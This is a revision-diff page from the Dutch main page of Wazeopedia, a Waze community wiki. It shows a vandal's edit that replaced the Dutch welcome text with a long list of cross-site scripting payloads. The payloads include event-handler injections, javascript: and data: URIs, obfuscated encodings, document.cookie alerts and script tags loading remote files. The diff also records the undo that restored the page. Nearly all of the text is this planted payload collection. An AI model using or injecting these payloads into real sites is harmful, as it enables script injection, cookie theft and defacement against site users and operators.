Difference between revisions of "Hoofdpagina"

From Wazeopedia
(%253Cscript%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbefor)
(Versie 18415 van GigaaG (overleg) ongedaan gemaakt)
Tag: Undo
 
(29 intermediate revisions by 3 users not shown)
Line 1: Line 1:
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
+
<languages />
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
+
<translate>
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
+
==Welkom bij Waze Nederland== <!--T:2-->
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
+
[[File:Wiki nl.png|right|200px]]  
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
+
Welkom Wazer!<br />
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
+
<br />
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
+
Je bent geïnteresseerd in Waze en vraagt je af wat voor soort app Waze is.<br />
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
+
Je gebruikt de app en vraagt je af wat je kunt doen om het te verbeteren.<br />
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
+
Je werkt aan de kaart en vraagt je af hoe je een bepaalde situatie het best kunt aanpakken.<br />
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
+
<br />
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
+
Voor algemene informatie kun je de [https://wazeopedia.waze.com/wiki/Global/Main_Page global Wiki pagina's] en de [https://www.waze.com/ Waze home page] bezoeken.<br />
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
+
Voor informatie over Waze op de [[ABC-islands|ABC-eilanden]] kun je naar hun [[ABC-islands|Wiki]] gaan.<br />
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
+
<br />
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
+
Deze Wiki geeft specifieke informatie over Waze in Nederland.  
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
 
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
 
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
 
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
 
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
 
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
 
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
 
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
 
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
 
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
 
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
 
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
 
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
 
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
 
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
 
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
 
<iframe src=http://xss.rocks/scriptlet.html <
 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
 
<iframe  src="&Tab;javascript:prompt(1)&Tab;">
 
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
 
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
 
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
 
<img/src=`` onerror=this.onerror=confirm(1)
 
<form><isindex formaction="javascript&colon;confirm(1)"
 
<img src=``&NewLine; onerror=alert(1)&NewLine;
 
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
 
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
 
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
 
<script /**/>/**/alert(1)/**/</script /**/
 
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>
 
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
 
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
 
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
 
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
 
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
 
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
 
<form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
 
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
 
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
 
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
 
http://www.google<script .com>alert(document.location)</script
 
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
 
<img/src=@&#32;&#13; onerror = prompt('&#49;')
 
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
 
<script ^__^>alert(String.fromCharCode(49))</script ^__^
 
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
 
&#00;</form><input type&#61;"date" onfocus="alert(1)">
 
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
 
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
 
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
 
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
 
<script [[User:Loveme5454|Loveme5454]] ([[User talk:Loveme5454|talk]])>alert(0%0)</script [[User:Loveme5454|Loveme5454]] ([[User talk:Loveme5454|talk]])>
 
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
 
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
 
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
 
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
 
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
 
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
 
<div/style="width:expression(confirm(1))">X</div> {IE7}
 
<iframe// src=javaSCRIPT&colon;alert(1)
 
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
 
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
 
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
 
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
 
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
 
</plaintext\></|\><plaintext/onmouseover=prompt(1)
 
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
 
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
 
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
 
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
 
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
 
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
<var onmouseover="prompt(1)">On Mouse Over</var>
 
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
 
<img src="/" =_=" title="onerror='prompt(1)'">
 
<%<!--'%><script>alert(1);</script -->
 
<script src="data:text/javascript,alert(1)"></script>
 
<iframe/src \/\/onload = prompt(1)
 
<iframe/onreadystatechange=alert(1)
 
<svg/onload=alert(1)
 
<input value=<><iframe/src=javascript:confirm(1)
 
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
 
http://www.<script>alert(1)</script .com
 
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
 
<svg><script ?>alert(1)
 
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
 
<img src=`xx:xx`onerror=alert(1)>
 
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
 
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 
<math><a xlink:href="//jsfiddle.net/t846h/">click
 
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
 
<svg contentScriptType=text/vbs><script>MsgBox+1
 
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
 
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
 
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
 
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
 
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
 
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
 
<script>+-+-1-+-+alert(1)</script>
 
<body/onload=&lt;!--&gt;&#10alert(1)>
 
<script itworksinallbrowsers>/*<script* */alert(1)</script
 
<img src ?itworksonchrome?\/onerror = alert(1)
 
<svg><script>//&NewLine;confirm(1);</script </svg>
 
<svg><script onlypossibleinopera:-)> alert(1)
 
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
 
<script x> alert(1) </script 1=2
 
<div/onmouseover='alert(1)'> style="x:">
 
<--`<img/src=` onerror=alert(1)> --!>
 
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
 
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
 
"><img src=x onerror=window.open('https://www.google.com/');>
 
<form><button formaction=javascript&colon;alert(1)>CLICKME
 
<math><a xlink:href="//jsfiddle.net/t846h/">click
 
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
 
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
 
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
 
<script\x20type="text/javascript">javascript:alert(1);</script>
 
<script\x3Etype="text/javascript">javascript:alert(1);</script>
 
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
 
<script\x09type="text/javascript">javascript:alert(1);</script>
 
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
 
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
 
<script\x0Atype="text/javascript">javascript:alert(1);</script>
 
'`"><\x3Cscript>javascript:alert(1)</script>       
 
'`"><\x00script>javascript:alert(1)</script>
 
<img src=1 href=1 onerror="javascript:alert(1)"></img>
 
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
 
<video src=1 href=1 onerror="javascript:alert(1)"></video>
 
<body src=1 href=1 onerror="javascript:alert(1)"></body>
 
<image src=1 href=1 onerror="javascript:alert(1)"></image>
 
<object src=1 href=1 onerror="javascript:alert(1)"></object>
 
<script src=1 href=1 onerror="javascript:alert(1)"></script>
 
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
 
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
 
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
 
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
 
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
 
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
 
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
 
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
 
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
 
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
 
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
 
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
 
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
 
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
 
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
 
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
 
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
 
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
 
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
 
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
 
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
 
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
 
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
 
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
 
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
 
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
 
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
 
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
 
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
 
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
 
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
 
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
 
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
 
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
 
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
 
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
 
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
 
<object onError object onError="javascript:javascript:alert(1)"></object onError>
 
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
 
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
 
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
 
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
 
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
 
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
 
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
 
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
 
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
 
<body onload body onload="javascript:javascript:alert(1)"></body onload>
 
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
 
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
 
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
 
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
 
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
 
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
 
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
 
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
 
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
 
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
 
\x3Cscript>javascript:alert(1)</script>
 
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
 
<script>javascript:alert(1)</script\x0D
 
<script>javascript:alert(1)</script\x0A
 
<script>javascript:alert(1)</script\x0B
 
<script charset="\x22>javascript:alert(1)</script>
 
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
 
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
 
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
 
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
 
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
 
`"'><img src='#\x27 onerror=javascript:alert(1)>
 
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
 
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
 
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<script>/* *\x2A/javascript:alert(1)// */</script>
 
<script>/* *\x00/javascript:alert(1)// */</script>
 
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
 
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
 
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
 
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
 
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
 
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
 
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
 
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
 
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
 
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
 
'`"><\x3Cscript>javascript:alert(1)</script>
 
'`"><\x00script>javascript:alert(1)</script>
 
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
 
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
 
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
 
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
 
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
 
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
 
<script\x20type="text/javascript">javascript:alert(1);</script>
 
<script\x3Etype="text/javascript">javascript:alert(1);</script>
 
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
 
<script\x09type="text/javascript">javascript:alert(1);</script>
 
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
 
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
 
<script\x0Atype="text/javascript">javascript:alert(1);</script>
 
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
 
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
 
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
 
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
 
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
 
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
 
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
 
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
 
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
 
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
 
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
 
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
 
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
 
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
